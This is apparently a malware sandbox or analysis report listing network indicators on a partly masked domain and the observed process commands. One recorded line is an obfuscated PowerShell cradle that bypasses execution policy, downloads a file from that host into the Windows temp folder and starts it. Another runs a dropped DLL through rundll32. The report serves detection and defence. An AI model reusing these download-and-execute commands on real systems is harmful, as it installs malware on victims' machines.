Technical Information
- http://al###af.info/report.doc as c:/windows/temp/report.doc
- http://al###af.info/Report.doc
- http://al###af.info/GfSFMitE.dll
- DNS ASK al###af.info
- '<SYSTEM32>\cmd.exe' /c powershell.exe -exec bypass -nop -sta -w 1 (New-Object System.Net.WebClient).Do%os:~0,1%nloadFile('http://al###af.info/Report.doc','C:/Windows/Temp/Report.doc');Start-Process 'C:/Windows/Tem...
- '<SYSTEM32>\rundll32.exe' C:/Windows/Temp/ROwXYy.dll,XTpscnnq